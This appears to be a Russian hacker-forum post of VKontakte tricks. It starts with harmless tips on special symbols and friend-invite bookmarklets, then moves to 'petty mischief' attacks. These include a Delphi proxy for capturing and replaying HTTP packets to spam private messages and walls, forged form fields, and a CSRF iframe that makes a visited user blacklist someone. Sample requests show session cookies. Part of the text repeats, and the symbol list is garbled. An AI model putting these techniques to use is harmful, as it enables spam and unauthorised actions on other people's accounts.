3. Вставить какой-либо спец-символ (звёздочка, чердечка, пр.) нужно либоа) нажать комбинацию клавишь “alt” и какую-либо цифру с правой стороны клавиатуры! для сердечка нужна 3…! ))б) Пуск>Стандартные>Служебные>Таблица символов Там все символы и комбинации клавиш к ним. Например ® - Alt+0174 (Примечание: в этой таблице символов символов дофига, но копируются в контакт не все!, атолько те, у которых в правом нижнем углу таблицы написана комбинация клавиш)
Примечание #2:
ЧТОБЫ ПОЛУЧАЛОСЬ, НУЖНО ЧТОБЫ КЛАВИША NumLock БЫЛА ВКЛЮЧЕНА. Тогда все у всех получиться.
P.S. Для пользователей мак мака - соответственно вместо ALT используем OPTION =)
Также можно скопировать и вставить нужный вам символ отсюда:
+•В¦¬Х¦CНО™)®>•OOOOOO¦¦¦
¦¦¦¦¦¦¦•••0O?v
?$¦••0¦¦¦O•OOO¦¦56¦••
;90?¦+??????©¶?{ceIO’I?? + A
? ? ? ? ? ? ? ї ? С ? L ? ??
???¦“L?¦ОS§
AA6§6¦¦E••b“q{¦¦•0¦¦d d
4. Посмотреть историю изменения статуса любого пользователя. последние 10 изменений.
Зайдите на страницу пользователя. Адрес в браузерной строке выглядит так:
http://vkontakte.ru/profile.php?id=[ID пользователя]
и добавьте в конце строки:
&activityhistory=1
что бы получилось:
http://vkontakte.ru/profile.php?id=[ID пользователя]&activityhistory=1
и нажмите ENTER.
теперь вы можете видеть историю изменения.
5. Как пригласить сразу всех друзей в группу
1) Зайдите в "Пригласить в группу"
2) Скопируйте в адресную строку следующее :
java script:function addall(){var butt_all='[>>>Приглашаааем!<<<] '; j=0; var div_s=document.getElementsByTagName("div");for(var i=0;i 3) Уберите пробел между "java ( ) script" (с самого начала)
4) Нажмите "Enter"
Над списком с друзьями, перед "Пригласите Друзей" - появится надпись - "Приглашааааем", нажимайте на эту надпись и все друзья выделятся!
(надпись"Приглашааааем" под курсором не выделяеться, просто кликните по любой из букв) 4) Нажмите кнопку "Выслать приглашения"
6. Как пригласить всех друзей на встречу
1. Копируем "java script:for(var i = 0; i < 5000; i++) document.inviteFriends.elements[i].checked = true" без кавычек.
2. Вставляем в адресную строку браузера.
3. Удаляем пробел между java и script.
4. Жмём ENTER - выделятся все Ваши друзья.
5. Жмём пригласить


Мелкие пакости vkontakte

Для кого-то потребуется дельфи 6,7/ C/ php.. для отправки пакетов.
Так же можно использовать программу inetCrack, в которой уже реализован метод приёма и передачи TCP пакета.

Всё, что будет ниже описано, исключительно для новичков. Ну что, перейдём к делу.

1. Спам по личкам.

{маленький пример на дельфи}
--------------------------------------------------
Создаём форму и закидываем на неё ClientSocket\ServerSocket\Memo1\Memo2\Button1\Butt on2
Цитата
{создаём сервер}
procedure TForm1.FormCreate(Sender: TObject);
begin
ServerSocket1.Port:=1488;
ServerSocket1.Active:=true;
memo1.Clear;
memo2.Clear;
button1.Caption:='подкл.';
button2.Caption:='посылаем';
end;

{будем принимать данные с 8888 порта в memo1}
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo1.Lines.Text:=socket.ReceiveText;
end;

{активируем клиент}
procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:='vkontakte.ru';
ClientSocket1.Port:=80;
ClientSocket1.Active:=true;
end;

{посылаем данные}
procedure TForm1.Button2Click(Sender: TObject);
begin
ClientSocket1.Socket.SendText(memo1.Lines.Text);
end;

{ответ от vkontakte.ru будет в memo2}
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo2.Lines.Text:=socket.ReceiveText;
end;

Заходим http://vkontakte.ru/mail.php?act=write, указываем тему и текст сообщения.
Далее настраиваем браузер через веб прокси 127.0.0.1:1488
Компилируем и запускаем проект, а в браузере тыкаем кнопку отправить.. в memo1 появится пакет, который посылает ваш браузер. {упрощённый вариант}
Нажимаем кнопку отправить, тем самым мы отправляем сообщение по указанному адресату.

Пример пакета:
Цитата
POST http://vkontakte.ru/mail.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: vkontakte.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 121
Content-Type: application/x-www-form-urlencoded

act=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=
3116221&title=111111111&toFriends=1&message=222222222

Рассматриваем последнюю строку, "act=sent&misc=1&to_reply=0&to_ids%5B%5D=3116221&members_name=&to_id=
3116321&title=111111111&toFriends=1&message=222222222"

to_id=3116321&title=111111111&toFriends=1&message=222222222
Тут всё предельно просто, для того, что бы написать спамер, нужна смена последней строки и посылка пакета.
Так же не забывайте учитывать Content-Length: 121 - кол-во символов последней строки. По аналогии можно спамить и стены.
--------------------------------------------------

2. Автоматическая смена имя&фамилия&ник

Действуем так же.

Пример пакета:
Цитата
POST http://vkontakte.ru/settings.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: vkontakte.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: remixInformation=1; remixAdminsBar=0; remixforums=1; remixlang=0; remixGroupType=0; remixourEvents=1; remixRecentNews=1; remixfriends=1; remixopinions=1; remixfriendsOnline=1; remixastatus=1; remixvideos=0; remixnotes=1; remixfriendsCommon=1; remixlinksBar=1; remixaudios=1; remixpersonal=0; remixwall=1; remixmid=452418; remixemail=fuck%40mail.ru; remixpass=872486652hf34124; remixalbums=1; remixref=452418; remixchk=5; remixeducation=0; remixclosed_tabs=0; remixfilters=279; remixautobookmark=14
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 145
Content-Type: application/x-www-form-urlencoded

act=change_name&hash=7013d90741dh5711284841182&nickname=
Noctambulaar&subm=1&first_name=myfirstname&last_name=mylastname

Надеюсь у Вас получится написать автосмену, как у меня, рэндом nick\first\last каждую секунду. хD

3. Украшательства вашего клуба
В этом случае приведу html пример.

В сточке <input type="hidden" name="gid" id="gid" value="874628"> подставьте свой id клуба.

group.html:
group.html

Что я добавил?
Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or \n}

4. Меняем поля в своём профиле.
У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.

5. Дата рождения.
В моём профиле дата рождения установлена 111111. Привожу html пример.
Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который ниже

sploit.html
sploit.html

выбираем дату 31 Мая 66666 года.

По аналогии переноса строки можно надругаться над всем.

5. Закачка картинки вместо граффити.
{готовая реализация}
http://www.polus.com.ru/vkontakte.php
http://www.zilmar.com/viewpage.php?page_id=4

6. Чёрный список.
Хотите, что бы нужный человек добавил другого в черный список?
Посылаем человека на страницу с таким кодом.
black.html
Цитата
<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>
id конечно же меняем. По аналогии можно много что сделать.
group.html

Что я добавил?
Я изменил input на textarea, тем самым, в названии можно использовать перенос строки. {<br> or \n}

4. Меняем поля в своём профиле.
У себя я изменил поле Религия по примеру 3., все делается по аналогии, input заменяем на textarea.

5. Дата рождения.
В моём профиле дата рождения установлена 111111. Привожу html пример.
Заходим http://vkontakte.ru/profileEdit.php смотрим текст страницы, ищем <input type="hidden" name="hash" id="hash" value=" и заменяем всю строку на строку из html примера, который ниже

sploit.html
sploit.html

выбираем дату 31 Мая 66666 года.

По аналогии переноса строки можно надругаться над всем.

5. Закачка картинки вместо граффити.
{готовая реализация}
http://www.polus.com.ru/vkontakte.php
http://www.zilmar.com/viewpage.php?page_id=4

6. Чёрный список.
Хотите, что бы нужный человек добавил другого в черный список?
Посылаем человека на страницу с таким кодом.
black.html
Цитата
<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=1125629>
id конечно же меняем. По аналогии можно много что сделать.

Зы .Прошу сильно статью не критиковать!))
ZiLiBoBa antichat.ru